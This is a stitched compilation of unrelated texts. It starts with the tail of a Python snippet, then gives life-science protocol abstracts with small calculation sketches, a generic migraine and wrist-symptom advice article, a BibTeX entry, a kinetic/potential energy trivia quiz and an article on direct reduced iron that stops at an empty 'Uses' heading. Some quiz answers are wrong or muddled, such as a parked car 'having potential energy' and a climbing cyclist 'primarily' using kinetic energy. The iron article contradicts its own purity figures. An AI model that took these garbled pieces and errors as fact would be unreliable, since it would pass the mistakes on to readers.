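# Example: 0.5 g dry soil incubated for 3 h; a 2.5 nmol standard reads 500 units.
print(potential_activity(1400, 100, 50, 500, 2.5, 3.0, 0.5))  # ~4.2
```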
Identification of Post-translational Modifications of Plant Protein Complexes
Authors: Sophie J. M. Piquerez, Alexi L. Balmuth, Jan Sklenář, Alexandra M. E. Jones, John P. Rathjen, Vardis Ntoukakis. Institutions: University of Warwick, Norwich Research Park, The Australian National University.
Plants adapt quickly to changing environments due to elaborate perception and signaling systems. During pathogen attack, plants rapidly respond to infection via the recruitment and activation of immune complexes. Activation of immune complexes is associated with post-translational modifications (PTMs) of proteins, such as phosphorylation, glycosylation, or ubiquitination. Understanding how these PTMs are choreographed will lead to a better understanding of how resistance is achieved. Here we describe a protein purification method for nucleotide-binding leucine-rich repeat (NB-LRR)-interacting proteins and the subsequent identification of their PTMs. With small modifications, the protocol can be applied to the purification of other plant protein complexes. The method is based on the expression of an epitope-tagged version of the protein of interest, which is subsequently partially purified by immunoprecipitation and subjected to mass spectrometry for identification of interacting proteins and PTMs. This protocol demonstrates that: (i) dynamic changes in PTMs such as phosphorylation can be detected by mass spectrometry; (ii) it is important to have sufficient quantities of the protein of interest, as this can compensate for the limited purity of the immunoprecipitate; and (iii) in order to detect PTMs of a protein of interest, the protein has to be immunoprecipitated in sufficient quantity. Plant Biology, Issue 84, plant-microbe interactions, protein complex purification, mass spectrometry, protein phosphorylation, Prf, Pto, AvrPto, AvrPtoB

Mapping Bacterial Functional Networks and Pathways in Escherichia coli using Synthetic Genetic Arrays
Authors: Alla Gagarinova, Mohan Babu, Jack Greenblatt, Andrew Emili. Institutions: University of Toronto, University of Regina.
Phenotypes are determined by a complex series of physical (e.g. protein-protein) and functional (e.g. gene-gene or genetic) interactions (GIs)1. While physical interactions can indicate which bacterial proteins are associated as complexes, they do not necessarily reveal pathway-level functional relationships1. GI screens, in which the growth of double mutants bearing two deleted or inactivated genes is measured and compared to the corresponding single mutants, can illuminate epistatic dependencies between loci and hence provide a means to query and discover novel functional relationships2. Large-scale GI maps have been reported for eukaryotic organisms like yeast3-7, but GI information remains sparse for prokaryotes8, which hinders the functional annotation of bacterial genomes. To this end, we and others have developed high-throughput quantitative bacterial GI screening methods9,10. Here, we present the key steps required to perform the quantitative E. coli Synthetic Genetic Array (eSGA) screening procedure on a genome scale9, using natural bacterial conjugation and homologous recombination to systematically generate and measure the fitness of large numbers of double mutants in a colony array format. Briefly, a robot is used to transfer, through conjugation, chloramphenicol (Cm)-marked mutant alleles from engineered Hfr (high frequency of recombination) 'donor strains' into an ordered array of kanamycin (Kan)-marked F- recipient strains. Typically, we use loss-of-function single mutants bearing non-essential gene deletions (e.g. the 'Keio' collection11) and essential gene hypomorphic mutations (i.e. alleles conferring reduced protein expression, stability, or activity9,12,13) to query the functional associations of non-essential and essential genes, respectively. After conjugation and the ensuing genetic exchange mediated by homologous recombination, the resulting double mutants are selected on solid medium containing both antibiotics. After outgrowth, the plates are digitally imaged and colony sizes are quantitatively scored using an in-house automated image processing system14. GIs are revealed when the growth rate of a double mutant is either significantly better or worse than expected9. Aggravating (or negative) GIs often result between loss-of-function mutations in pairs of genes from compensatory pathways that impinge on the same essential process2.
Here, the loss of a single gene is buffered, such that either single mutant is viable. However, the loss of both pathways is deleterious and results in synthetic lethality or sickness (i.e. slow growth). Conversely, alleviating (or positive) interactions can occur between genes in the same pathway or protein complex2, as the deletion of either gene alone is often sufficient to perturb the normal function of the pathway or complex, such that additional perturbations do not reduce activity, and hence growth, further. Overall, systematically identifying and analyzing GI networks can provide unbiased, global maps of the functional relationships between large numbers of genes, from which pathway-level information missed by other approaches can be inferred9. Genetics, Issue 69, Molecular Biology, Medicine, Biochemistry, Microbiology, Aggravating, alleviating, conjugation, double mutant, Escherichia coli, genetic interaction, Gram-negative bacteria, homologous recombination, network, synthetic lethality or sickness, suppression

Setting-up an In Vitro Model of Rat Blood-brain Barrier (BBB): A Focus on BBB Impermeability and Receptor-mediated Transport
Authors: Yves Molino, Françoise Jabès, Emmanuelle Lacassagne, Nicolas Gaudin, Michel Khrestchatisky. Institutions: VECT-HORUS SAS, CNRS, NICN UMR 7259.
The blood-brain barrier (BBB) specifically regulates molecular and cellular flux between the blood and the nervous tissue. Our aim was to develop and characterize a highly reproducible rat syngeneic in vitro model of the BBB using co-cultures of primary rat brain endothelial cells (RBEC) and astrocytes to study receptors involved in transcytosis across the endothelial cell monolayer. Astrocytes were isolated by mechanical dissection following trypsin digestion and were frozen for later co-culture. RBEC were isolated from 5-week-old rat cortices. The brains were cleaned of meninges and white matter, and mechanically dissociated following enzymatic digestion. Thereafter, the tissue homogenate was centrifuged in bovine serum albumin to separate vessel fragments from nervous tissue. The vessel fragments underwent a second enzymatic digestion to free endothelial cells from their extracellular matrix. The remaining contaminating cells, such as pericytes, were further eliminated by plating the microvessel fragments in puromycin-containing medium. They were then passaged onto filters for co-culture with astrocytes grown on the bottom of the wells. RBEC expressed high levels of tight junction (TJ) proteins such as occludin, claudin-5 and ZO-1, with a typical localization at the cell borders. The transendothelial electrical resistance (TEER) of the brain endothelial monolayers, indicating the tightness of the TJs, reached 300 ohm·cm² on average. The endothelial permeability coefficient (Pe) for lucifer yellow (LY) was highly reproducible, with an average of 0.26 ± 0.11 × 10⁻³ cm/min. Brain endothelial cells organized in monolayers expressed the efflux transporter P-glycoprotein (P-gp), showed polarized transport of rhodamine 123, a ligand for P-gp, and showed specific transport of transferrin-Cy3 and DiILDL across the endothelial cell monolayer. In conclusion, we provide a protocol for setting up an in vitro BBB model that is highly reproducible due to the quality assurance methods, and that is suitable for research on BBB transporters and receptors. Medicine, Issue 88, rat brain endothelial cells (RBEC), mouse, spinal cord, tight junction (TJ), receptor-mediated transport (RMT), low density lipoprotein (LDL), LDLR, transferrin, TfR, P-glycoprotein (P-gp), transendothelial electrical resistance (TEER)
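The permeability coefficient quoted above is usually obtained from a clearance-slope analysis. The sketch below outlines that calculation under simplifying assumptions (linear clearance over the sampling window, a single cell-free filter correction); variable names and the structure are illustrative rather than the exact published procedure:

```python
import numpy as np

def pe_cm_per_min(times_min, abluminal_conc, v_abluminal_ul,
                  luminal_conc0, blank_slope_ul_min, area_cm2):
    """Endothelial permeability coefficient Pe from clearance-vs-time data."""
    # Cleared volume (ul) of luminal medium at each sampling time.
    cleared_ul = np.asarray(abluminal_conc) * v_abluminal_ul / luminal_conc0
    ps_total = np.polyfit(times_min, cleared_ul, 1)[0]  # slope, ul/min
    # Subtract the series contribution of the empty (cell-free) filter insert.
    ps_endo = 1.0 / (1.0 / ps_total - 1.0 / blank_slope_ul_min)
    return ps_endo * 1e-3 / area_cm2  # 1 ul = 1e-3 cm^3, so Pe is in cm/min
```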
Investigating Protein-protein Interactions in Live Cells Using Bioluminescence Resonance Energy Transfer
Authors: Pelagia Deriziotis, Sarah A. Graham, Sara B. Estruch, Simon E. Fisher. Institutions: Max Planck Institute for Psycholinguistics, Donders Institute for Brain, Cognition and Behaviour.
Assays based on Bioluminescence Resonance Energy Transfer (BRET) provide a sensitive and reliable means to monitor protein-protein interactions in live cells. BRET is the non-radiative transfer of energy from a 'donor' luciferase enzyme to an 'acceptor' fluorescent protein. In the most common configuration of this assay, the donor is Renilla reniformis luciferase and the acceptor is Yellow Fluorescent Protein (YFP). Because the efficiency of energy transfer is strongly distance-dependent, observation of the BRET phenomenon requires that the donor and acceptor be in close proximity. To test for an interaction between two proteins of interest in cultured mammalian cells, one protein is expressed as a fusion with luciferase and the second as a fusion with YFP. An interaction between the two proteins of interest may bring the donor and acceptor sufficiently close for energy transfer to occur. Compared to other techniques for investigating protein-protein interactions, the BRET assay is sensitive, requires little hands-on time and few reagents, and is able to detect interactions which are weak, transient, or dependent on the biochemical environment found within a live cell. It is therefore an ideal approach for confirming putative interactions suggested by yeast two-hybrid or mass spectrometry proteomics studies, and in addition it is well-suited for mapping interacting regions, assessing the effect of post-translational modifications on protein-protein interactions, and evaluating the impact of mutations identified in patient DNA. Cellular Biology, Issue 87, Protein-protein interactions, Bioluminescence Resonance Energy Transfer, Live cell, Transfection, Luciferase, Yellow Fluorescent Protein, Mutations
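A common readout for this assay is a corrected BRET ratio: acceptor-channel over donor-channel emission, minus the same ratio measured from a donor-only control to remove luciferase bleed-through into the acceptor channel. A minimal sketch with illustrative channel names and numbers:

```python
def corrected_bret_ratio(yfp_em, rluc_em, yfp_em_donor_only, rluc_em_donor_only):
    """Corrected BRET ratio; values meaningfully above 0 indicate energy transfer."""
    return yfp_em / rluc_em - yfp_em_donor_only / rluc_em_donor_only

print(corrected_bret_ratio(5200, 10000, 3600, 9000))  # 0.12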
Reporter-based Growth Assay for Systematic Analysis of Protein Degradation
Authors: Itamar Cohen, Yifat Geffen, Guy Ravid, Tommer Ravid. Institutions: The Hebrew University of Jerusalem.
Protein degradation by the ubiquitin-proteasome system (UPS) is a major regulatory mechanism for protein homeostasis in all eukaryotes. The standard approach to determining intracellular protein degradation relies on biochemical assays for following the kinetics of protein decline. Such methods are often laborious and time consuming and therefore not amenable to experiments aimed at assessing multiple substrates and degradation conditions. As an alternative, cell growth-based assays have been developed that are, in their conventional format, end-point assays that cannot quantitatively determine relative changes in protein levels. Here we describe a method that faithfully determines changes in protein degradation rates by coupling them to yeast cell-growth kinetics. The method is based on an established selection system in which the uracil auxotrophy of URA3-deleted yeast cells is rescued by an exogenously expressed reporter protein, comprising a fusion between the essential URA3 gene and a degradation determinant (degron). The reporter protein is designed so that its synthesis rate is constant whilst its degradation rate is determined by the degron. As cell growth in uracil-deficient medium is proportional to the relative levels of Ura3, growth kinetics are entirely dependent on the reporter protein degradation. This method accurately measures changes in intracellular protein degradation kinetics. It was applied to: (a) assessing the relative contribution of known ubiquitin-conjugating factors to proteolysis, (b) E2 conjugating enzyme structure-function analyses and (c) identification and characterization of novel degrons. Application of the degron-URA3-based system transcends the protein degradation field, as it can also be adapted to monitoring changes in protein levels associated with functions of other cellular pathways. Cellular Biology, Issue 93, Protein Degradation, Ubiquitin, Proteasome, Baker's Yeast, Growth kinetics, Doubling time
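Since the readout of this assay is growth, a sketch of the underlying kinetics calculation may help. Assuming exponential growth, the specific growth rate is the slope of log(OD600) versus time, and the doubling time follows directly (data values are illustrative):

```python
import numpy as np

def doubling_time_h(times_h, od600):
    """Doubling time from an exponential-phase fit of log(OD600) vs time."""
    mu = np.polyfit(times_h, np.log(od600), 1)[0]  # specific growth rate, 1/h
    return np.log(2) / mu

print(doubling_time_h([0, 2, 4, 6], [0.05, 0.10, 0.20, 0.40]))  # 2.0 h
```

Slower degradation of the Ura3 reporter raises its steady-state level and shortens the doubling time in uracil-deficient medium, so comparing doubling times across degrons reports on relative degradation rates.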
A Protocol for Computer-Based Protein Structure and Function Prediction
Authors: Ambrish Roy, Dong Xu, Jonathan Poisson, Yang Zhang. Institutions: University of Michigan, University of Kansas.
Genome sequencing projects have deciphered millions of protein sequences, which require knowledge of their structure and function to improve the understanding of their biological roles. Although experimental methods can provide detailed information for a small fraction of these proteins, computational modeling is needed for the majority of protein molecules which are experimentally uncharacterized. The I-TASSER server is an on-line workbench for high-resolution modeling of protein structure and function. Given a protein sequence, a typical output from the I-TASSER server includes secondary structure prediction, predicted solvent accessibility of each residue, homologous template proteins detected by threading and structure alignments, up to five full-length tertiary structural models, and structure-based functional annotations for enzyme classification, Gene Ontology terms and protein-ligand binding sites. All the predictions are tagged with a confidence score which indicates how accurate the predictions are expected to be in the absence of experimental data. To facilitate the special requests of end users, the server provides channels to accept user-specified inter-residue distance and contact maps to interactively change the I-TASSER modeling; it also allows users to specify any protein as a template, or to exclude any template proteins during the structure assembly simulations. The structural information could be collected by the users based on experimental evidence or biological insight with the purpose of improving the quality of I-TASSER predictions. The server was evaluated as the best program for protein structure and function prediction in the recent community-wide CASP experiments. There are currently >20,000 registered scientists from over 100 countries who are using the on-line I-TASSER server. Biochemistry, Issue 57, On-line server, I-TASSER, protein structure prediction, function prediction

Biochemical Assays for Analyzing Activities of ATP-dependent Chromatin Remodeling Enzymes
Authors: Lu Chen, Soon-Keat Ooi, Joan W. Conaway, Ronald C. Conaway. Institutions: Stowers Institute for Medical Research, Kansas University Medical Center.
Members of the SNF2 family of ATPases often function as components of multi-subunit chromatin remodeling complexes that regulate nucleosome dynamics and DNA accessibility by catalyzing ATP-dependent nucleosome remodeling. Biochemically dissecting the contributions of individual subunits of such complexes to the multi-step ATP-dependent chromatin remodeling reaction requires the use of assays that monitor the production of reaction products and measure the formation of reaction intermediates. This JoVE protocol describes assays that allow one to measure the biochemical activities of chromatin remodeling complexes or subcomplexes containing various combinations of subunits. Chromatin remodeling is measured using an ATP-dependent nucleosome sliding assay, which monitors the movement of a nucleosome on a DNA molecule using an electrophoretic mobility shift assay (EMSA)-based method. Nucleosome binding activity is measured by monitoring the formation of remodeling complex-bound mononucleosomes using a similar EMSA-based method, and DNA- or nucleosome-dependent ATPase activity is assayed using thin layer chromatography (TLC) to measure the rate of conversion of ATP to ADP and phosphate in the presence of either DNA or nucleosomes. Using these assays, one can examine the functions of subunits of a chromatin remodeling complex by comparing the activities of the complete complex to those of complexes lacking one or more subunits. The human INO80 chromatin remodeling complex is used as an example; however, the methods described here can be adapted to the study of other chromatin remodeling complexes. Biochemistry, Issue 92, chromatin remodeling, INO80, SNF2 family ATPase, biochemical assays, ATPase, nucleosome remodeling, nucleosome binding
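For the TLC-based ATPase assay above, the conversion rate is typically derived from the relative band intensities of ADP and remaining ATP. A minimal single-time-point sketch, with illustrative signal values and no background correction:

```python
def atpase_rate_uM_per_min(adp_signal, atp_signal, atp0_uM, minutes):
    """ATP hydrolysis rate estimated from TLC band intensities."""
    frac_converted = adp_signal / (adp_signal + atp_signal)
    return frac_converted * atp0_uM / minutes

print(atpase_rate_uM_per_min(3000, 7000, 100, 20))  # 1.5 uM ATP per min
```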
Using SCOPE to Identify Potential Regulatory Motifs in Coregulated Genes
Authors: Viktor Martyanov, Robert H. Gross. Institutions: Dartmouth College.
SCOPE is an ensemble motif finder that uses three component algorithms in parallel to identify potential regulatory motifs by over-representation and motif position preference1. Each component algorithm is optimized to find a different kind of motif. By taking the best of these three approaches, SCOPE performs better than any single algorithm, even in the presence of noisy data1. In this article, we utilize a web version of SCOPE2 to examine genes that are involved in telomere maintenance. SCOPE has been incorporated into at least two other motif finding programs3,4 and has been used in other studies5-8. The three algorithms that comprise SCOPE are BEAM9, which finds non-degenerate motifs (ACCGGT), PRISM10, which finds degenerate motifs (ASCGWT), and SPACER11, which finds longer bipartite motifs (ACCnnnnnnnnGGT). These three algorithms have been optimized to find their corresponding type of motif. Together, they allow SCOPE to perform extremely well. Once a gene set has been analyzed and candidate motifs identified, SCOPE can look for other genes that contain the motif which, when added to the original set, will improve the motif score. This can occur through over-representation or motif position preference. Working with partial gene sets that have biologically verified transcription factor binding sites, SCOPE was able to identify most of the rest of the genes also regulated by the given transcription factor. Output from SCOPE shows candidate motifs, their significance, and other information both as a table and as a graphical motif map. FAQs and video tutorials are available at the SCOPE web site, which also includes a "Sample Search" button that allows the user to perform a trial run. SCOPE has a very friendly user interface that enables novice users to access the algorithm's full power without having to become an expert in the bioinformatics of motif finding. As input, SCOPE can take a list of genes or FASTA sequences. These can be entered in browser text fields, or read from a file. The output from SCOPE contains a list of all identified motifs with their scores, number of occurrences, fraction of genes containing the motif, and the algorithm used to identify the motif. For each motif, result details include a consensus representation of the motif, a sequence logo, a position weight matrix, and a list of instances for every motif occurrence (with exact positions and "strand" indicated). Results are returned in a browser window and also optionally by email. Previous papers describe the SCOPE algorithms in detail1,2,9-11. Genetics, Issue 51, gene regulation, computational biology, algorithm, promoter sequence motif

Immunoblot Analysis
Authors: Sean Gallagher, Deb Chakavarti. Institutions: UVP, LLC, Keck Graduate Institute of Applied Life Sciences.
Immunoblotting (western blotting) is a rapid and sensitive assay for the detection and characterization of proteins that works by exploiting the specificity inherent in antigen-antibody recognition. It involves the solubilization and electrophoretic separation of proteins, glycoproteins, or lipopolysaccharides by gel electrophoresis, followed by quantitative transfer and irreversible binding to nitrocellulose, PVDF, or nylon. The immunoblotting technique has been useful in identifying specific antigens recognized by polyclonal or monoclonal antibodies and is highly sensitive (1 ng of antigen can be detected). This unit provides protocols for protein separation, blotting proteins onto membranes, immunoprobing, and visualization using chromogenic or chemiluminescent substrates. Basic Protocols, Issue 16, Current Protocols Wiley, Immunoblotting, Biochemistry, Western Blotting, chromogenic substrates, chemiluminescent substrates, protein detection.
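Returning to SCOPE: the over-representation idea at the heart of its scoring can be illustrated with a minimal binomial sketch, comparing how many promoters in the query set contain a motif against the genome-wide background rate. This is a deliberate simplification, not a reimplementation of BEAM, PRISM or SPACER:

```python
from scipy.stats import binom

def overrepresentation_p(hits_in_set, set_size, hits_in_genome, genome_size):
    """P(X >= hits_in_set) promoters containing the motif under the
    genome-wide background rate."""
    p_background = hits_in_genome / genome_size
    return binom.sf(hits_in_set - 1, set_size, p_background)

print(overrepresentation_p(12, 20, 300, 6000))  # tiny p => over-represented
```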
Strategies for Coping with Migraine and Wrist Sensations

Understanding Migraines and Wrist Sensations

Migraine attacks and wrist sensations can significantly impact daily life and require effective coping strategies. Migraines are a neurological condition characterized by severe headaches often accompanied by other symptoms such as sensitivity to light and sound, nausea, and vomiting. Wrist sensations, such as tingling, numbness, or pain, can result from nerve compression or repetitive motion.

Recording and Tracking Symptoms

A crucial step in managing migraine attacks and wrist sensations is recording and tracking symptoms. This helps monitor patterns, identify triggers, and assist with diagnosis and treatment. Consider the following methods for tracking symptoms:

• Keeping a migraine diary: Keep a record of pain intensity, duration, location, and related wrist sensations. Note any triggers, such as certain foods, hormonal changes, or stress. For example, if you notice that your migraine attacks tend to occur after consuming chocolate, you can avoid it to reduce the frequency of migraine attacks.

• Using smartphone apps or online tools: Utilize convenient digital tools to track symptoms on the go. These apps provide data analysis and visual representations of your symptoms, facilitating better communication with healthcare professionals.

Managing Migraine and Wrist Sensations in Daily Life

Lifestyle modifications play a significant role in managing migraine attacks and wrist sensations. Consider implementing the following strategies:

• Healthy diet and hydration: Maintain a balanced diet, avoiding known migraine triggers such as processed foods, caffeine, and alcohol. Stay hydrated throughout the day. For example, instead of reaching for a cup of coffee, opt for herbal tea or water.

• Stress management techniques: Explore stress reduction methods, such as deep breathing exercises, meditation, or yoga, to minimize the impact of stress on migraine attacks and wrist sensations. Find activities that help you relax and incorporate them into your daily routine.

• Regular exercise and physical activity: Engage in moderate physical activity, such as walking or swimming, to promote overall well-being and migraine management. Consult with a healthcare professional before starting a new exercise routine.

Avoiding Triggers

Identifying and avoiding personal triggers is key to preventing migraine attacks and managing wrist sensations. Consider the following tips:

• Adjusting daily routines: Create a consistent sleep schedule, maintain regular meal times, and manage stress levels to minimize potential triggers. For example, establish a relaxing bedtime routine and ensure you are getting enough sleep each night.

• Creating a calm and migraine-friendly environment: Limit exposure to bright lights, loud noises, and strong odors. Designate a quiet and dimly lit space for relaxation. Use noise-canceling headphones or earplugs to reduce sensory stimuli.

Medication and Treatment Options

Various medication and treatment options are available to manage migraine attacks and alleviate wrist sensations. Consult with a healthcare professional to determine the most suitable approach for your specific condition. Options may include:

• Over-the-counter pain relievers: Non-prescription medications like ibuprofen or aspirin may provide relief for mild to moderate migraine attacks.
However, it’s important to follow the recommended dosage and be aware of potential side effects.

• Prescription medications for migraine attacks: Your doctor may prescribe specific medications, such as triptans, to treat acute migraine attacks, or preventive medications to reduce the frequency and intensity of migraine episodes. Follow your healthcare provider’s instructions and inform them of any side effects you experience.

• Physical therapy for wrist sensations: A physical therapist can design exercises and provide treatments to alleviate wrist sensations caused by nerve compression or repetitive motion. They may recommend specific stretches or techniques to improve wrist mobility and reduce discomfort.

• Alternative therapies: Consider alternative approaches such as acupuncture, relaxation techniques, or biofeedback to complement your migraine management plan. These options can provide additional relief and relaxation. Consult with a qualified practitioner before trying alternative therapies.

Seeking Medical Advice and Support

Consulting a healthcare professional is essential for accurate diagnosis and personalized treatment plans. When seeking medical advice, consider the following:

• Available treatment options: Discuss the range of treatment options available and their suitability for your specific migraine attacks and wrist sensations. Ask about the potential benefits and risks of each treatment.

• Potential side effects and risks: Understand the potential side effects and risks associated with different medications and treatments to make informed decisions. Disclose any existing medical conditions and medications you are currently taking to your healthcare provider.

• Referrals to specialists if necessary: Your healthcare provider may refer you to specialists, such as neurologists or orthopedists, for further evaluation and treatment of migraine attacks or wrist sensations. Follow through with the recommended referrals to ensure comprehensive care.

Conclusion

Managing migraine attacks and wrist sensations requires a multifaceted approach. By recording and tracking symptoms, implementing lifestyle modifications, avoiding triggers, exploring medication options, and seeking medical advice and support, individuals can effectively cope with these challenging conditions and improve their quality of life. Remember that each person’s experience and response to treatments may vary. It’s important to find what works best for your individual needs and seek professional guidance along the way. Empower yourself to take control of migraine attacks and wrist sensations in your daily life.
% Encoding: UTF-8 @COMMENT{BibTeX export based on data in FAU CRIS: https://cris.fau.de/} @COMMENT{For any questions please write to [email protected]} @inproceedings{faucris.245485774, abstract = {The asymmetrical half-bridge converter implemented with GaN-switches represents a great candidate for achieving high power density and high efficiency. These requirements call for the implementation of a synchronous rectifier on the secondary side to push the efficiency. Furthermore, higher switching frequencies lead to smaller passive components needed for compact power supplies. In order to gain accurate and reliable simulation results for these high switching frequencies, this paper presents a detailed simulation model featuring parasitics of all semiconductors and transformer capacitances. Besides current and voltage waveforms of one switching cycle, this model allows for studying ZVS transitions as well. Measurements on a practical test setup deliver waveforms very close to the simulation results and thus prove the validity of the simulation model.}, author = {Kohlhepp, Benedikt and Zeller, Valentin and Barwig, Markus and Dürbaum, Thomas}, booktitle = {2020 22nd European Conference on Power Electronics and Applications, EPE 2020 ECCE Europe}, date = {2020-09-07/2020-09-11}, doi = {10.23919/EPE20ECCEEurope43536.2020.9215674}, faupublication = {yes}, isbn = {9789075815368}, keywords = {Gallium Nitride (GaN); Simulation; Soft switching; Switched-mode power supply; ZvS converters}, note = {Created from Fastlane, Scopus look-up}, peerreviewed = {unknown}, publisher = {Institute of Electrical and Electronics Engineers Inc.}, title = {{Detailed} {Simulation} {Model} of an {Asymmetrical} {Half}-{Bridge} {PWM} {Converter} with {Synchronous} {Rectification} including {Parasitic} {Elements}}, venue = {Lyon}, year = {2020} }
Kinetic And Potential Energy Trivia

1. What type of energy does a parked car have?
Answer: Potential
Explanation: A parked car has potential energy due to its position. This type of energy is stored based on the object's position relative to other objects, with gravity providing the relevant force. For a car parked on a hill, the higher up the hill it is, the greater its gravitational potential energy. That potential energy would be converted into kinetic energy (the energy of motion) if the car started to move downhill. Potential energy is therefore the most accurate description for a stationary car, particularly one parked on an incline.

2. Which form of energy is possessed by a flying bird?
Answer: Kinetic
Explanation: A flying bird primarily possesses kinetic energy, the form of energy associated with motion. As the bird flies, chemical energy stored in its muscles is converted into kinetic energy. The faster the bird flies, the more kinetic energy it has. This energy enables the bird to keep moving and maneuvering in the air, overcoming air resistance and gravity through continued muscular effort.

3. What energy transformation occurs when a bow is drawn and released?
Answer: Potential to Kinetic
Explanation: When a bow is drawn, the work done in pulling the bowstring back is stored as elastic potential energy in the flexed limbs of the bow. Once the bowstring is released, this potential energy is rapidly converted into kinetic energy as the bow returns to its original shape and the arrow is propelled forward with significant force. This demonstrates the transformation of energy from potential to kinetic within the mechanics of archery.

4. Where is potential energy highest in a swinging pendulum?
Answer: At the top
Explanation: In a swinging pendulum, potential energy is highest at the top of the swing, where the pendulum's speed is lowest. At this point, the pendulum has maximum potential energy due to its elevated position against gravity.
As the pendulum begins its descent, this potential energy is converted into kinetic energy, which increases as the pendulum speeds up on the way to the lowest point. The maximum potential energy at the top is thus a result of the pendulum's height and the gravitational potential associated with it.

5. What type of energy does a compressed spring hold?
Answer: Potential
Explanation: A compressed spring holds potential energy, stored as a result of its deformation. When the spring is compressed, mechanical work is done against the spring's restoring force, and that work is stored as elastic potential energy. This energy is retained until the compressing force is removed, at which point the stored energy is converted back into kinetic energy as the spring returns to its original shape, pushing against whatever compressed it.

6. Which energy is primarily used by a cyclist climbing a hill?
Answer: Kinetic
Explanation: A cyclist climbing a hill pedals to keep the bicycle moving, that is, to maintain its kinetic energy. As the cyclist gains elevation, an increasing share of that effort is stored as gravitational potential energy, which could be converted back into kinetic energy on a downhill stretch. The cyclist's effort in climbing therefore translates directly into potential energy accumulated against gravity.

7. What kind of energy does water behind a dam possess?
Answer: Potential
Explanation: The water stored behind a dam possesses potential energy due to its elevated position relative to the base of the dam. This gravitational potential energy is significant because of the large volume of water and the height from which it can fall. When the water is released, this potential energy is converted into kinetic energy as the water moves downward through the dam's turbines, generating electricity as a result of this energy transformation.

8. Which form of energy is demonstrated by a stretched rubber band?
Answer: Potential
Explanation: A stretched rubber band exhibits potential energy. When the rubber band is stretched, it stores elastic potential energy according to how far it is deformed from its natural state. This stored energy is the result of the work done in stretching it, and it can be released as kinetic energy when the band snaps back to its original shape, propelling itself or any attached object forward.

9. What kind of energy transformation occurs when brakes are applied to a moving car?
Answer: Kinetic to Thermal
Explanation: When brakes are applied to a moving car, the kinetic energy of the car (due to its motion) is transformed into thermal energy through friction between the car's brake pads and the wheel or drum. This friction generates heat, converting the car's energy of motion into heat energy that dissipates into the environment. This is an example of the conservation of energy: the kinetic energy is not lost but converted into another form.

10. Which type of energy does a fruit hanging from a tree exhibit?
Answer: Potential
Explanation: A fruit hanging from a tree exhibits potential energy due to its position relative to the ground. This gravitational potential energy depends on the fruit's mass, the acceleration due to gravity, and its height above the ground. Should the fruit fall, this potential energy converts into kinetic energy as the fruit accelerates towards the Earth under the influence of gravity.
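Several of these answers can be tied together with a short worked example (numbers chosen purely for illustration, taking g ≈ 9.8 m/s²). A 0.2 kg fruit hanging 3 m above the ground stores

$$E_{p} = mgh = 0.2 \times 9.8 \times 3 \approx 5.9\ \text{J},$$

and if it falls, conservation of energy gives its speed just before it lands:

$$\tfrac{1}{2}mv^{2} = mgh \quad\Rightarrow\quad v = \sqrt{2gh} = \sqrt{2 \times 9.8 \times 3} \approx 7.7\ \text{m/s}.$$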
Direct reduced iron

Direct-reduced iron (DRI), also called sponge iron,[1] is produced from the direct reduction of iron ore (in the form of lumps, pellets or fines) by a reducing gas produced from natural gas or coal. 'Reduced iron' derives its name from the chemical change that iron ore undergoes when it is heated in a furnace at high temperatures in the presence of hydrocarbon-rich gases. Direct reduction refers to processes which reduce iron oxides to metallic iron below the melting point of iron; the product of such solid-state processes is called direct reduced iron. The reducing gas is a mixture of gases, primarily hydrogen (H2) and carbon monoxide (CO).

Process

Direct reduction processes can be divided roughly into two categories: gas-based and coal-based. In both cases, the objective of the process is to drive off the oxygen contained in various forms of iron ore (sized ore, concentrates, pellets, mill scale, furnace dust, etc.) in order to convert the ore, without melting it (below 1,200 °C), to metallic iron. The direct reduction process is comparatively energy efficient. Steel made using DRI requires significantly less coal, in that a traditional blast furnace is not needed. DRI is most commonly made into steel with electric arc furnaces to take advantage of the heat retained in the DRI product.[2] In modern times, direct reduction processes have been developed specifically to overcome the difficulties of conventional blast furnaces. DRI is successfully manufactured in various parts of the world through either natural-gas- or coal-based technology. The initial investment and operating costs of direct reduction plants are low compared to integrated steel plants, and they are more suitable for developing countries where supplies of coking coal are limited. Factors that help make DRI economical:

• Direct-reduced iron has about the same iron content as pig iron, typically 90–94% total iron (depending on the quality of the raw ore) as opposed to about 93% for molten pig iron, so it is an excellent feedstock for the electric furnaces used by mini mills, allowing them to use lower grades of scrap for the rest of the charge or to produce higher grades of steel.
• Hot-briquetted iron (HBI) is a compacted form of DRI designed for ease of shipping, handling, and storage.
• Hot direct reduced iron (HDRI) is DRI that is not cooled before discharge from the reduction furnace but is immediately transported to a waiting electric arc furnace and charged, thereby saving energy.
• The direct reduction process uses pelletized iron ore or natural "lump" ore. One exception is the fluidized bed process, which requires sized iron ore particles. Few ores are suitable for direct reduction.
• The direct reduction process can use natural gas contaminated with inert gases, avoiding the need to remove these gases for other use. However, any inert gas contamination of the reducing gas lowers the quality of that gas stream and the thermal efficiency of the process.
• Supplies of powdered ore and raw natural gas are both available in areas such as Northern Australia, avoiding transport costs for the gas. In most cases the DRI plant is located near a natural gas source, as it is more cost-effective to ship the ore rather than the gas.
• This method produces 97% pure iron.
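The overall chemistry can be summarized by the net reduction reactions for the two main components of the reducing gas (simplified stoichiometry; in practice the reduction proceeds stepwise through Fe₃O₄ and FeO):

Fe₂O₃ + 3 CO → 2 Fe + 3 CO₂
Fe₂O₃ + 3 H₂ → 2 Fe + 3 H₂O

The CO-based reaction is mildly exothermic while the H₂-based reaction is mildly endothermic, which is one reason gas-based processes balance the composition of the reformed reducing gas.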
India is the world's largest producer of direct-reduced iron, a vital constituent of the steel industry.[1] Many other countries use variants of the process, providing iron for local engineering industries.

Problems

Direct-reduced iron is highly susceptible to oxidation and rusting if left unprotected, and is normally quickly processed further to steel. The bulk iron can also catch fire, since it is pyrophoric.[3] Unlike blast furnace pig iron, which is almost pure metal, DRI contains some siliceous gangue, which needs to be removed in the steel-making process.

History

Producing sponge iron and then working it was the earliest method used to obtain iron in the Middle East, Egypt, and Europe, where it remained in use until at least the 16th century. There is some evidence that the bloomery method was also used in China, but China had developed blast furnaces to obtain pig iron by 500 BCE. The advantage of the bloomery technique is that iron can be obtained at a lower furnace temperature, only about 1,100 °C or so. The disadvantage, relative to using a blast furnace, is that only small quantities can be made at a time.

Uses

